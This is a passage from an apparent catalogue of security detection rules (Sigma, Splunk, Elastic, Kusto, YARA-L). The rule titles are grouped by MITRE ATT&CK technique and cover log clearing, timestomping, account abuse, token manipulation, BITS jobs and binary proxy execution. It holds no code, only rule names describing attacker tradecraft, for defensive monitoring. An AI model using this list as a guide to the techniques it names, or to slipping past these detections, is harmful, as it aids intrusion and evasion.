- Sigma Potential Secure Deletion with SDelete test
- Elastic Potential Timestomp in Executable Files production
- Sigma Potentially Suspicious Ping/Copy Command Combination test
- Sigma PowerShell Console History Logs Deleted test
- Sigma PowerShell Deleted Mounted Share test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Powershell Timestomp test
- Sigma Prefetch File Deleted test
- Splunk Process Deleting Its Process File Path production
- Kusto Qakbot Campaign Self Deletion available
- Splunk Recursive Delete of Directory In Batch CMD production
- Sigma RunMRU Registry Key Deletion experimental
- Sigma RunMRU Registry Key Deletion - Registry experimental
- Splunk Sdelete Application Execution production
- Kusto Security Event log cleared available
- Elastic Sensitive Audit Policy Sub-Category Disabled production
- Sigma Shadow Copies Deletion Using Operating Systems Utilities stable
- Sigma Suspicious IO.FileStream test
- Sigma Suspicious Ping/Del Command Combination test
- Elastic Suspicious Print Spooler File Deletion production
- Sigma Sysmon Driver Unloaded Via Fltmc.EXE test
- Sigma System time changed experimental
- Sigma System time changed (PowerShell) experimental
- Sigma TeamViewer Log File Deleted test
- Sigma Terminal Server Client Connection History Cleared - Registry test
- Splunk Timestamp Manipulation (PowerShell)
- Splunk Timestamp Manipulation (Windows Event Log)
- Sigma Tomcat WebServer Logs Deleted test
- Sigma Unauthorized System Time Modification test
- Sigma Unmount Share Via Net.EXE test
- Sigma Use Of Remove-Item to Delete File - ScriptBlock test
- Splunk USN Journal Deletion production
- Splunk Windows ConsoleHost History File Deletion production
- Splunk Windows Default Rdp File Deletion production
- YARA-L Windows Event Log Cleared
- Elastic Windows Event Logs Cleared production
- Splunk Windows Indicator Removal Via Rmdir production
- Sigma Windows Mail App Mailbox Access Via PowerShell Script test
- Splunk Windows Powershell History File Deletion production
- Splunk Windows Rdp AutomaticDestinations Deletion production
- Splunk Windows RDP Cache File Deletion production
- Splunk Windows RDP Server Registry Deletion production
Indicator Removal: Clear Windows Event Logs T1070.001 11 rules
- Splunk Clear Windows Event Logs (Windows Event Log)
- Elastic Clearing Windows Event Logs production
- Elastic Disable Windows Event and Security Logs Using Built-in Tools production
- Sigma Event log clear attempt (command) experimental
- Sigma Event log clear attempt (PowerShell) experimental
- Sigma Event log clear attempt (wmi) experimental
- Sigma Event log cleared (native) experimental
- Sigma Event log cleared using Diagnostics (via PowerShell) stable
- Elastic Sensitive Audit Policy Sub-Category Disabled production
- YARA-L Windows Event Log Cleared
- Elastic Windows Event Logs Cleared production
Indicator Removal: Clear Command History T1070.003 10 rules
- Sigma Clear PowerShell History - PowerShell test
- Sigma Clear PowerShell History - PowerShell Module test
- Sigma Clearing Windows Console History test
- Elastic Clearing Windows Console History production
- Sigma Disable Powershell Command History test
- Sigma RunMRU Registry Key Deletion experimental
- Sigma RunMRU Registry Key Deletion - Registry experimental
- Sigma Suspicious IO.FileStream test
- Splunk Windows ConsoleHost History File Deletion production
- Splunk Windows Powershell History File Deletion production
Indicator Removal: File Deletion T1070.004 24 rules
- Sigma ADS Zone.Identifier Deleted test
- Sigma ADS Zone.Identifier Deleted By Uncommon Application test
- Sigma Backup Catalog Deleted test
- Splunk Clear Unallocated Sector Using Cipher App production
- Elastic Delete Volume USN Journal with Fsutil production
- Sigma Directory Removal Via Rmdir test
- Sigma File Deleted Via Sysinternals SDelete test
- Sigma File Deletion Via Del test
- Elastic File or Directory Deletion Command production
- Sigma Greedy File Deletion Using Del test
- Elastic Potential REMCOS Trojan Execution production
- Sigma Potential Secure Deletion with SDelete test
- Sigma Potentially Suspicious Ping/Copy Command Combination test
- Sigma Prefetch File Deleted test
- Splunk Recursive Delete of Directory In Batch CMD production
- Splunk Sdelete Application Execution production
- Sigma Suspicious Ping/Del Command Combination test
- Elastic Suspicious Print Spooler File Deletion production
- Sigma TeamViewer Log File Deleted test
- Sigma Use Of Remove-Item to Delete File - ScriptBlock test
- Splunk Windows Default Rdp File Deletion production
- Splunk Windows Rdp AutomaticDestinations Deletion production
- Splunk Windows RDP Cache File Deletion production
- Splunk Windows RDP Server Registry Deletion production
Indicator Removal: Network Share Connection Removal T1070.005 6 rules
- Splunk Create or delete windows shares using net exe production
- Sigma Disable Administrative Share Creation at Startup test
- Sigma MaxMpxCt Registry Value Changed test
- Splunk Network Share Connection Removal (PowerShell)
- Sigma PowerShell Deleted Mounted Share test
- Sigma Unmount Share Via Net.EXE test
Indicator Removal: Timestomp T1070.006 9 rules
- Sigma File Creation Date Changed to Another Year test
- Elastic Potential Timestomp in Executable Files production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Powershell Timestomp test
- Sigma System time changed experimental
- Sigma System time changed (PowerShell) experimental
- Splunk Timestamp Manipulation (PowerShell)
- Splunk Timestamp Manipulation (Windows Event Log)
- Sigma Unauthorized System Time Modification test
Valid Accounts T1078 67 rules
- Elastic Access to a Sensitive LDAP Attribute production
- Kusto Account added and removed from privileged groups
- Elastic Account Discovery Command via SYSTEM Account production
- Sigma Account renamed to admin (or likely) account to evade defense experimental
- Splunk Account set to active via Net.exe (EDR)
- Splunk Account set to active via Net.exe (Sysmon)
- Splunk Account set to active via Net.exe (Windows Event Log)
- Sigma Account Tampering - Suspicious Failed Logon Reasons test
- Sigma Admin User Remote Logon test
- Elastic AdminSDHolder Backdoor production
- Kusto AdminSDHolder Modifications
- Elastic AdminSDHolder SDProp Exclusion Added production
- Sigma Azure Windows virtual machine login via serial console experimental
- Sigma Commvault QLogin with PublicSharingUser and GUID Password (CVE-2025-57788) experimental
- Elastic Delegated Managed Service Account Modification by an Unusual User production
- Elastic dMSA Account Creation by an Unusual User production
- Sigma DMSA Link Attributes Modified experimental
- Sigma DMSA Service Account Created in Specific OUs - PowerShell experimental
- Kusto EatonForeseer - Unauthorized Logins available
- Kusto Email access via active sync
- Sigma External Remote RDP Logon from Public IP test
- Sigma External Remote SMB Logon from Public IP test
- Sigma Failed Logon From Public IP test
- Elastic First Time Seen Account Performing DCSync production
- Kusto Group created then added to built in domain local or global group
- Elastic Kerberos Pre-authentication Disabled for User production
- Sigma Lateral movement detection (based on "special groups" feature) experimental
- Elastic Mounting Hidden or WebDav Remote Shares production
- Splunk Multiple Host logons (Windows Event Log)
- Kusto Multiple Password Reset by user
- Sigma Network login performed to multiple targets experimental
- Sigma New DMSA Service Account Created in Specific OUs experimental
- Kusto New user created and added to the built-in administrators group
- Sigma Password Provided In Command Line Of Net.EXE test
- Elastic Potential Account Takeover - Logon from New Source IP production
- Elastic Potential Account Takeover - Mixed Logon Types production
- Elastic Potential Credential Access via DCSync production
- Elastic Potential Privileged Escalation via SamAccountName Spoofing production
- Elastic Remote Computer Account DnsHostName Update production
- Splunk Rubeus Password Change (Windows Event Log)
- Splunk Short Lived Windows Accounts production
- Kusto Sign-ins from IPs that attempt sign-ins to disabled accounts (Uses Authentication Normalization)
- Sigma Success login attempt on a Windows OpenSSH server experimental
- Splunk Suspicious Computer Account Name Change production
- Sigma Suspicious Computer Machine Password by PowerShell test
- Splunk Suspicious Kerberos Service Ticket Request production
- Sigma Suspicious Remote Logon with Explicit Credentials test
- Splunk Suspicious Ticket Granting Ticket Request production
- Splunk Unusual Number of Computer Service Tickets Requested experimental
- Splunk Unusual Number of Remote Endpoint Authentication Events experimental
- Kusto User account added to built in domain local or global group
- Kusto User account created and deleted within 10 mins
- Kusto User account enabled and disabled within 10 mins
- Sigma User Added to Local Administrator Group stable
- Kusto User login from different countries within 3 hours (Uses Authentication Normalization)
- Splunk Windows Azure PowerShell Module Installation Via PowerShell Script production
- Splunk Windows ConvertTo-AADIntBackdoor Execution Via PowerShell Script production
- Splunk Windows Entra User Management Via Azure CLI production
- Splunk Windows Group Policy Object Created production
- Splunk Windows Guest Account Enabled Via Net.EXE production
- Splunk Windows Large Number of Computer Service Tickets Requested production
- Splunk Windows Multiple Account Passwords Changed production
- Splunk Windows Multiple Accounts Deleted production
- Splunk Windows Multiple Accounts Disabled production
- Splunk Windows PowerView AD Access Control List Enumeration production
- Splunk WMIC Explicit Credentials (Sysmon)
- Splunk WMIC Explicit Credentials (Windows Event Log)
Valid Accounts: Default Accounts T1078.001 6 rules
- Splunk Account set to active via Net.exe (EDR)
- Splunk Account set to active via Net.exe (Sysmon)
- Splunk Account set to active via Net.exe (Windows Event Log)
- Sigma Admin User Remote Logon test
- Sigma Commvault QLogin with PublicSharingUser and GUID Password (CVE-2025-57788) experimental
- Splunk Windows Guest Account Enabled Via Net.EXE production
Valid Accounts: Domain Accounts T1078.002 20 rules
- Elastic Access to a Sensitive LDAP Attribute production
- Sigma Account renamed to admin (or likely) account to evade defense experimental
- Sigma Admin User Remote Logon test
- Elastic AdminSDHolder Backdoor production
- Elastic AdminSDHolder SDProp Exclusion Added production
- Elastic Delegated Managed Service Account Modification by an Unusual User production
- Elastic dMSA Account Creation by an Unusual User production
- Sigma DMSA Link Attributes Modified experimental
- Sigma DMSA Service Account Created in Specific OUs - PowerShell experimental
- Elastic First Time Seen Account Performing DCSync production
- Elastic Kerberos Pre-authentication Disabled for User production
- Sigma New DMSA Service Account Created in Specific OUs experimental
- Elastic Potential Credential Access via DCSync production
- Elastic Potential Privileged Escalation via SamAccountName Spoofing production
- Elastic Remote Computer Account DnsHostName Update production
- Splunk Suspicious Computer Account Name Change production
- Splunk Suspicious Kerberos Service Ticket Request production
- Splunk Suspicious Ticket Granting Ticket Request production
- Splunk Windows Group Policy Object Created production
- Splunk Windows PowerView AD Access Control List Enumeration production
Valid Accounts: Local Accounts T1078.003 4 rules
- Elastic Account Discovery Command via SYSTEM Account production
- Sigma Admin User Remote Logon test
- Elastic Mounting Hidden or WebDav Remote Shares production
- Splunk Short Lived Windows Accounts production
Valid Accounts: Cloud Accounts T1078.004 1 rule
- Splunk Windows Entra User Management Via Azure CLI production
Trusted Developer Utilities Proxy Execution T1127 54 rules
- Sigma AspNetCompiler Execution test
- Sigma C# IL Code Compilation Via Ilasm.EXE test
- Splunk CDB Execution (Sysmon)
- Splunk CDB Execution (Windows Event Log)
- Elastic Delayed Execution via Ping production
- Sigma Detection of PowerShell Execution via Sqlps.exe test
- Splunk ETW Registry Disabled production
- Elastic Execution of Persistent Suspicious Program production
- Elastic Execution via Microsoft DotNet ClickOnce Host production
- Elastic Execution via MS VisualStudio Pre/Post Build Events production
- Sigma JScript Compiler Execution test
- Sigma Kavremover Dropped Binary LOLBIN Usage test
- Elastic Microsoft Build Engine Started by a System Process production
- Elastic Microsoft Build Engine Started by an Office Application production
- Splunk Microsoft Build Engine Suspicious Parent Process (Sysmon)
- Splunk Microsoft Build Engine Suspicious Parent Process (Windows Event Log)
- Elastic Microsoft Build Engine Using an Alternate Name production
- Sigma Microsoft Workflow Compiler Execution test
- Elastic MsBuild Making Network Connections production
- Splunk MSBuild Suspicious Spawned By Script Process production
- Elastic Network Activity to a Suspicious Top Level Domain production
- Sigma Node Process Executions test
- Sigma Potential Arbitrary Code Execution Via Node.EXE test
- Sigma Potential Binary Proxy Execution Via Cdb.EXE test
- Elastic Potential Credential Access via Trusted Developer Utility production
- Sigma Potential Mftrace.EXE Abuse test
- Sigma Potentially Suspicious ASP.NET Compilation Via AspNetCompiler test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Elastic Process Injection by the Microsoft Build Engine production
- Splunk Proxy Execution via Appcert (PowerShell)
- Splunk Proxy Execution via Appcert (Sysmon)
- Splunk Proxy Execution via Appcert (Windows Event Log)
- Sigma Remote Thread Creation Ttdinject.exe Proxy test
- Sigma Silenttrinity Stager Msbuild Activity test
- Sigma SQL Client Tools PowerShell Session Detection test
- Elastic Suspicious .NET Code Compilation production
- Sigma Suspicious Child Process of AspNetCompiler test
- Elastic Suspicious Execution from a Mounted Device production
- Sigma Suspicious File Created by ArcSOC.exe experimental
- Splunk Suspicious microsoft workflow compiler rename production
- Splunk Suspicious microsoft workflow compiler usage production
- Splunk Suspicious msbuild path production
- Splunk Suspicious MSBuild Rename production
- Splunk Suspicious MSBuild Spawn production
- Sigma Suspicious Use of CSharp Interactive Console test
- Kusto Trusted Developer Utilities Proxy Execution available
- Splunk Unusual AppCert Child Process (Sysmon)
- Splunk Unusual AppCert Child Process (Windows Event Log)
- Elastic Unusual Network Activity from a Windows System Binary production
- Elastic Unusual Process Network Connection production
- Sigma Use of Remote.exe test
- Sigma Use of TTDInject.exe test
- Sigma Use of VSIISExeLauncher.exe test
- Sigma Use of Wfc.exe test
Trusted Developer Utilities Proxy Execution: MSBuild T1127.001 20 rules
- Elastic Delayed Execution via Ping production
- Elastic Execution of Persistent Suspicious Program production
- Elastic Execution via MS VisualStudio Pre/Post Build Events production
- Elastic Microsoft Build Engine Started by a System Process production
- Elastic Microsoft Build Engine Started by an Office Application production
- Splunk Microsoft Build Engine Suspicious Parent Process (Sysmon)
- Splunk Microsoft Build Engine Suspicious Parent Process (Windows Event Log)
- Elastic Microsoft Build Engine Using an Alternate Name production
- Elastic MsBuild Making Network Connections production
- Splunk MSBuild Suspicious Spawned By Script Process production
- Elastic Network Activity to a Suspicious Top Level Domain production
- Elastic Potential Credential Access via Trusted Developer Utility production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Elastic Process Injection by the Microsoft Build Engine production
- Sigma Silenttrinity Stager Msbuild Activity test
- Elastic Suspicious Execution from a Mounted Device production
- Splunk Suspicious msbuild path production
- Splunk Suspicious MSBuild Rename production
- Splunk Suspicious MSBuild Spawn production
- Elastic Unusual Network Activity from a Windows System Binary production
Trusted Developer Utilities Proxy Execution: ClickOnce T1127.002 1 rule
- Elastic Execution via Microsoft DotNet ClickOnce Host production
Access Token Manipulation T1134 49 rules
- Kusto Access Token Manipulation - Create Process with Token available
- Sigma Addition of SID History to Active Directory Object stable
- Sigma Anonymous login (RottenPotatoNG) experimental
- Sigma HackTool - Impersonate Execution test
- Sigma HackTool - Koh Default Named Pipe test
- Sigma HackTool - NoFilter Execution test
- Sigma HackTool - PPID Spoofing SelectMyParent Tool Execution test
- Sigma HackTool - SharpDPAPI Execution test
- Sigma HackTool - SharpImpersonation Execution test
- Sigma Meterpreter or Cobalt Strike Getsystem Service Installation - Security test
- Sigma Meterpreter or Cobalt Strike Getsystem Service Installation - System test
- Sigma New rights granted to an account for privilege escalation experimental
- Elastic Parent Process PID Spoofing production
- Kusto Possible Resource-Based Constrained Delegation Abuse
- Sigma Potential Access Token Abuse test
- Sigma Potential Meterpreter/CobaltStrike Activity test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Elastic Privilege Escalation via Named Pipe Impersonation production
- Elastic Privilege Escalation via Rogue Named Pipe Impersonation production
- Sigma Privilege escalation via runas (command) experimental
- Sigma Privilege escalation via RunasCS experimental
- Elastic Privileges Elevation via Parent Process PID Spoofing production
- Elastic Process Created with a Duplicated Token production
- Elastic Process Created with an Elevated Token production
- Elastic Process Creation via Secondary Logon production
- Kusto PRT Credential Stealing
- Sigma PUA - AdvancedRun Execution test
- Sigma PUA - AdvancedRun Suspicious Execution test
- Sigma RedSun - Conhost.exe Spawned by TieringEngineService.exe experimental
- Splunk Runas Execution in CommandLine production
- Elastic SeDebugPrivilege Enabled by a Suspicious Process production
- Kusto Service Principal Name (SPN) Assigned to User Account
- Sigma Suspicious Child Process Created as System test
- Elastic Suspicious SeIncreaseBasePriorityPrivilege Use production
- Sigma Suspicious SYSTEM User Process Creation test
- Elastic Unusual Parent-Child Relationship production
- Splunk Windows Access Token Manipulation SeDebugPrivilege production
- Splunk Windows Access Token Manipulation Winlogon Duplicate Token Handle production
- Splunk Windows Access Token Winlogon Duplicate Handle In Uncommon Path production
- Splunk Windows AD Cross Domain SID History Addition production
- Splunk Windows AD Privileged Account SID History Addition production
- Splunk Windows AD Same Domain SID History Addition production
- Splunk Windows AD SID History Attribute Modified production
- Splunk Windows Handle Duplication in Known UAC-Bypass Binaries production
- Splunk Windows Parent PID Spoofing with Explorer production
- Splunk Windows Privilege Escalation Suspicious Process Elevation production
- Splunk Windows Privilege Escalation System Process Without System Parent production
- Splunk Windows Privilege Escalation User Process Spawn System Process production
- Splunk Wscript Or Cscript Suspicious Child Process production
Access Token Manipulation: Token Impersonation/Theft T1134.001 18 rules
- Sigma Anonymous login (RottenPotatoNG) experimental
- Sigma HackTool - Impersonate Execution test
- Sigma HackTool - Koh Default Named Pipe test
- Sigma HackTool - NoFilter Execution test
- Sigma HackTool - SharpDPAPI Execution test
- Sigma HackTool - SharpImpersonation Execution test
- Sigma Meterpreter or Cobalt Strike Getsystem Service Installation - Security test
- Sigma Meterpreter or Cobalt Strike Getsystem Service Installation - System test
- Sigma Potential Access Token Abuse test
- Sigma Potential Meterpreter/CobaltStrike Activity test
- Elastic Privilege Escalation via Named Pipe Impersonation production
- Elastic Privilege Escalation via Rogue Named Pipe Impersonation production
- Elastic Process Created with a Duplicated Token production
- Kusto PRT Credential Stealing
- Splunk Runas Execution in CommandLine production
- Splunk Windows Access Token Manipulation Winlogon Duplicate Token Handle production
- Splunk Windows Access Token Winlogon Duplicate Handle In Uncommon Path production
- Splunk Windows Handle Duplication in Known UAC-Bypass Binaries production
Access Token Manipulation: Create Process with Token T1134.002 16 rules
- Kusto Access Token Manipulation - Create Process with Token available
- Sigma Meterpreter or Cobalt Strike Getsystem Service Installation - Security test
- Sigma Meterpreter or Cobalt Strike Getsystem Service Installation - System test
- Sigma Potential Meterpreter/CobaltStrike Activity test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Privilege escalation via runas (command) experimental
- Sigma Privilege escalation via RunasCS experimental
- Elastic Privileges Elevation via Parent Process PID Spoofing production
- Elastic Process Created with a Duplicated Token production
- Elastic Process Created with an Elevated Token production
- Elastic Process Creation via Secondary Logon production
- Sigma PUA - AdvancedRun Execution test
- Sigma PUA - AdvancedRun Suspicious Execution test
- Sigma RedSun - Conhost.exe Spawned by TieringEngineService.exe experimental
- Sigma Suspicious Child Process Created as System test
- Splunk Windows Access Token Manipulation SeDebugPrivilege production
Access Token Manipulation: Make and Impersonate Token T1134.003 4 rules
- Sigma HackTool - Impersonate Execution test
- Sigma HackTool - SharpDPAPI Execution test
- Sigma HackTool - SharpImpersonation Execution test
- Elastic Process Creation via Secondary Logon production
Access Token Manipulation: Parent PID Spoofing T1134.004 6 rules
- Sigma HackTool - PPID Spoofing SelectMyParent Tool Execution test
- Elastic Parent Process PID Spoofing production
- Elastic Privileges Elevation via Parent Process PID Spoofing production
- Elastic Unusual Parent-Child Relationship production
- Splunk Windows Parent PID Spoofing with Explorer production
- Splunk Wscript Or Cscript Suspicious Child Process production
Access Token Manipulation: SID-History Injection T1134.005 6 rules
- Sigma Addition of SID History to Active Directory Object stable
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Windows AD Cross Domain SID History Addition production
- Splunk Windows AD Privileged Account SID History Addition production
- Splunk Windows AD Same Domain SID History Addition production
- Splunk Windows AD SID History Attribute Modified production
Deobfuscate/Decode Files or Information T1140 44 rules
- Sigma Base64 Encoded PowerShell Command Detected test
- Kusto Base64 encoded Windows process command-lines available
- Kusto Base64 encoded Windows process command-lines (Normalized Process Events)
- Elastic Binary Content Copy via Cmd.exe production
- Splunk Certutil De-Obfuscate_Decode Files (Sysmon)
- Splunk Certutil De-Obfuscate_Decode Files (Windows Event Log)
- Splunk Certutil Execution (Sysmon)
- Splunk Certutil Execution (Windows Event Log)
- Sigma Certutil payload obfuscation (command) experimental
- Sigma Certutil payload obfuscation - Tchopper (command) experimental
- Splunk CertUtil With Decode Argument production
- Elastic Deprecated - Encoded Executable Stored in the Registry production
- Sigma DNS-over-HTTPS Enabled by Registry test
- Elastic Dynamic IEX Reconstruction via Method String Access production
- Kusto Ingress Tool Transfer - Certutil available
- YARA-L MITRE ATT&CK T1140 Encoded Powershell Command
- Sigma MSHTA Execution with Suspicious File Extensions test
- Kusto NRT Base64 Encoded Windows Process Command-lines available
- Kusto NRT Process executed from binary hidden in Base64 encoded file available
- Sigma Ping Hex IP test
- Sigma Potential BlackByte Ransomware Activity test
- Sigma Potential Commandline Obfuscation Using Escape Characters test
- Elastic Potential Dynamic IEX Reconstruction via Environment Variables production
- Elastic Potential PowerShell Obfuscation via Backtick-Escaped Variable Expansion production
- Elastic Potential PowerShell Obfuscation via Character Array Reconstruction production
- Elastic Potential PowerShell Obfuscation via Concatenated Dynamic Command Invocation production
- Elastic Potential PowerShell Obfuscation via High Numeric Character Proportion production
- Elastic Potential PowerShell Obfuscation via High Special Character Proportion production
- Elastic Potential PowerShell Obfuscation via Invalid Escape Sequences production
- Elastic Potential PowerShell Obfuscation via Reverse Keywords production
- Elastic Potential PowerShell Obfuscation via Special Character Overuse production
- Elastic Potential PowerShell Obfuscation via String Concatenation production
- Elastic Potential PowerShell Obfuscation via String Reordering production
- Sigma PowerShell Base64 Encoded FromBase64String Cmdlet test
- Sigma PowerShell Decompress Commands test
- Elastic PowerShell Obfuscation via Negative Index String Reversal production
- Kusto Process executed from binary hidden in Base64 encoded file available
- Kusto Qakbot Discovery Activies available
- Elastic Suspicious CertUtil Commands production
- Elastic Suspicious Windows Powershell Arguments production
- Sigma Suspicious XOR Encoded PowerShell Command test
- Sigma UNC4841 - Download Compressed Files From Temp.sh Using Wget test
- Sigma UNC4841 - Download Tar File From Untrusted Direct IP Via Wget test
- Sigma UNC4841 - SSL Certificate Exfiltration Via Openssl test
BITS Jobs T1197 28 rules
- Sigma BITS Client BitsProxy DLL Loaded By Uncommon Process experimental
- Splunk BITS Job Persistence production
- Sigma BITS payload downloaded via commandline experimental
- Sigma BITS payload downloaded via PowerShell experimental
- Sigma BITS Transfer Job Download From Direct IP test
- Sigma BITS Transfer Job Download From File Sharing Domains test
- Sigma BITS Transfer Job Download To Potential Suspicious Folder test
- Sigma BITS Transfer Job Downloading File Potential Suspicious Extension test
- Sigma BITS Transfer Job With Uncommon Or Suspicious Remote TLD test
- Elastic Bitsadmin Activity production
- Kusto Bitsadmin Activity available
- Splunk BITSAdmin Download File production
- Splunk BITSadmin Execution (PowerShell)
- Splunk BITSadmin Execution (Sysmon)
- Splunk BITSadmin Execution (Windows Event Log)
- Splunk BitsAdmin NetCat PowerCat File Transfer (EDR)
- Splunk BitsAdmin NetCat PowerCat File Transfer (Sysmon)
- Splunk BitsAdmin NetCat PowerCat File Transfer (Windows Event Log)
- Sigma File Download Via Bitsadmin test
- Sigma File Download Via Bitsadmin To A Suspicious Target Folder test
- Sigma File With Suspicious Extension Downloaded Via Bitsadmin test
- Sigma Monitoring For Persistence Via BITS test
- Sigma New BITS Job Created Via Bitsadmin test
- Sigma New BITS Job Created Via PowerShell test
- Elastic Persistence via BITS Job Notify Cmdline production
- Splunk PowerShell Start-BitsTransfer production
- Sigma Suspicious Download From Direct IP Via Bitsadmin test
- Sigma Suspicious Download From File-Sharing Website Via Bitsadmin test
Indirect Command Execution T1202 62 rules
- Sigma Arbitrary Command Execution Using WSL test
- Elastic Attempt to Install or Run Kali Linux via WSL production
- Elastic Command Execution via ForFiles production
- Splunk Conhost.exe Kernel call (Sysmon)
- Splunk Conhost.exe Kernel call (Windows Event Log)
- Sigma Custom File Open Handler Executes PowerShell test
- Sigma Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE test
- Elastic Execution via Windows Subsystem for Linux production
- Sigma Findstr Launching .lnk File test
- Elastic Host File System Changes via Windows Subsystem for Linux production
- Splunk Indirect Command Execution (Sysmon)
- Splunk Indirect Command Execution (Windows Event Log)
- Sigma Indirect Command Execution From Script File Via Bash.EXE test
- Elastic Indirect Command Execution via Forfiles/Pcalua production
- Sigma Indirect Command Execution via SFTP ProxyCommand experimental
- Sigma Indirect Inline Command Execution Via Bash.EXE test
- Sigma Outlook EnableUnsafeClientMailRules Setting Enabled test
- Sigma Potential Arbitrary Command Execution Using Msdt.EXE test
- Sigma Potential Arbitrary Command Execution Via FTP.EXE test
- Sigma Potential Arbitrary DLL Load Using Winword test
- Sigma Potential Arbitrary File Download Using Office Application test
- Sigma Potential Arbitrary File Download Via Cmdl32.EXE test
- Sigma Potential Binary Impersonating Sysinternals Tools test
- Sigma Potentially Suspicious Child Process Of VsCode test
- Sigma Potentially Suspicious Child Processes Spawned by ConHost experimental
- Sigma Potentially Suspicious Office Document Executed From Trusted Location test
- Elastic Proxy Execution via Console Window Host production
- Sigma Proxy Execution via Vshadow experimental
- Elastic Proxy Execution via Windows OpenSSH production
- Sigma Renamed CURL.EXE Execution test
- Sigma Renamed FTP.EXE Execution test
- Sigma Renamed NirCmd.EXE Execution test
- Sigma Renamed PAExec Execution test
- Sigma Renamed PingCastle Binary Execution test
- Sigma Renamed ZOHO Dctask64 Execution test
- Sigma Rundll32 Execution Without CommandLine Parameters test
- Splunk ssh.exe Execution (Sysmon)
- Splunk ssh.exe Execution (Windows Event Log)
- Sigma Suspicious Cabinet File Execution Via Msdt.EXE test
- Sigma Suspicious Child Process Of BgInfo.EXE test
- Splunk Suspicious Conhost.exe Commands (Sysmon)
- Splunk Suspicious Conhost.exe Commands (Windows Event Log)
- Elastic Suspicious Execution via Windows Subsystem for Linux production
- Sigma Suspicious High IntegrityLevel Conhost Legacy Option test
- Sigma Suspicious Remote Child Process From Outlook test
- Sigma Suspicious Runscripthelper.exe test
- Sigma Suspicious Service Binary Directory test
- Sigma Suspicious Splwow64 Without Params test
- Sigma Suspicious ZipExec Execution test
- Sigma Troubleshooting Pack Cmdlet Execution test
- Sigma Uncommon Child Process Of BgInfo.EXE test
- Sigma Uncommon Child Process Of Conhost.EXE test
- Sigma Uncommon Child Process Of Setres.EXE test
- Sigma Windows Binary Executed From WSL test
- Splunk Windows Indirect Command Execution Via forfiles production
- Splunk Windows Indirect Command Execution Via pcalua production
- Splunk Windows Indirect Command Execution Via Series Of Forfiles production
- Splunk Windows RunMRU Command Execution production
- Elastic Windows Subsystem for Linux Distribution Installed production
- Elastic Windows Subsystem for Linux Enabled via Dism Utility production
- Sigma WSL Child Process Anomaly test
- Sigma WSL Kali-Linux Usage experimental
Exploitation for Stealth T1211 9 rules
- Kusto ASR Bypassing Writing Executable Content available
- Sigma Audit CVE Event test
- Splunk Conhost.exe Kernel call (Sysmon)
- Splunk Conhost.exe Kernel call (Windows Event Log)
- Sigma Microsoft Malware Protection Engine Crash test
- Sigma Microsoft Malware Protection Engine Crash - WER test
- Splunk Suspicious Conhost.exe Commands (Sysmon)
- Splunk Suspicious Conhost.exe Commands (Windows Event Log)
- Sigma Writing Of Malicious Files To The Fonts Folder test
System Script Proxy Execution T1216 19 rules
- Sigma Assembly Loading Via CL_LoadAssembly.ps1 test
- Sigma AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl test
- Sigma AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File test
- Splunk Bash -c Execution - Windows (Sysmon)
- Splunk Bash -c Execution - Windows (Windows Event Log)
- Elastic Delayed Execution via Ping production
- Sigma Execute Code with Pester.bat test
- Sigma Execute Code with Pester.bat as Parent test
- Sigma Launch-VsDevShell.PS1 Proxy Execution test
- Sigma Potential Manage-bde.wsf Abuse To Proxy Execution test
- Sigma Potential Process Execution Proxy Via CL_Invocation.ps1 test
- Sigma Potential Script Proxy Execution Via CL_Mutexverifiers.ps1 test
- Sigma Pubprn.vbs Proxy Execution test
- Sigma Remote Code Execute via Winrm.vbs test
- Sigma Suspicious CustomShellHost Execution test
- Sigma SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code test
- Sigma Uncommon Sigverif.EXE Child Process test
- Sigma UtilityFunctions.ps1 Proxy Dll test
- Splunk Windows System Script Proxy Execution Syncappvpublishingserver production
System Script Proxy Execution: PubPrn T1216.001 2 rules
- Sigma Launch-VsDevShell.PS1 Proxy Execution test
- Sigma Pubprn.vbs Proxy Execution test
System Binary Proxy Execution T1218 526 rules
- Splunk .msc Executed from Unusual Location (Sysmon)
- Splunk .msc Executed from Unusual Location (Windows Event Log)
- Splunk 3CXDesktopApp.exe Execution (EDR)
- Splunk 3CXDesktopApp.exe Execution (Sysmon)
- Splunk 3CXDesktopApp.exe Execution (Windows Event Log)
- Sigma Abusing Print Executable test
- Sigma AddinUtil.EXE Execution From Uncommon Directory test
- Sigma AgentExecutor PowerShell Execution test
- Sigma APT29 2018 Phishing Campaign CommandLine Indicators stable
- Sigma APT29 2018 Phishing Campaign File Indicators stable
- Sigma Arbitrary Command Execution Using WSL test
- Sigma Arbitrary DLL or Csproj Code Execution Via Dotnet.EXE test
- Sigma Arbitrary File Download Via IMEWDBLD.EXE test
- Sigma Arbitrary File Download Via MSEDGE_PROXY.EXE test
- Sigma Arbitrary File Download Via MSOHTMED.EXE test
- Sigma Arbitrary File Download Via MSPUB.EXE test
- Sigma Arbitrary File Download Via PresentationHost.EXE test
- Sigma Arbitrary File Download Via Squirrel.EXE test
- Sigma Arbitrary MSI Download Via Devinit.EXE test
- Sigma Atbroker Registry Change test
- Splunk ATBroker.exe Execution (PowerShell)
- Splunk ATBroker.exe Execution (Sysmon)
- Splunk ATBroker.exe Execution (Windows Event Log)
- Sigma BaaUpdate.exe Suspicious DLL Load experimental
- Sigma Bad Opsec Defaults Sacrificial Processes With Improper Arguments test
- Splunk Bash -c Execution - Windows (Sysmon)
- Splunk Bash -c Execution - Windows (Windows Event Log)
- Sigma Binary Proxy Execution Via Dotnet-Trace.EXE test
- Sigma BitLockerTogo.EXE Execution test
- Sigma Bypass UAC via CMSTP test
- Splunk CMLUA Or CMSTPLUA UAC Bypass production
- Splunk Cmstp Execution (Sysmon)
- Splunk Cmstp Execution (Windows Event Log)
- Sigma CMSTP Execution Process Access stable
- Sigma CMSTP Execution Process Creation stable
- Sigma CMSTP Execution Registry Event stable
- Sigma CMSTP UAC Bypass via COM Object Access stable
- Sigma CobaltStrike Load by Rundll32 test
- Sigma Code Execution via Pcwutl.dll test
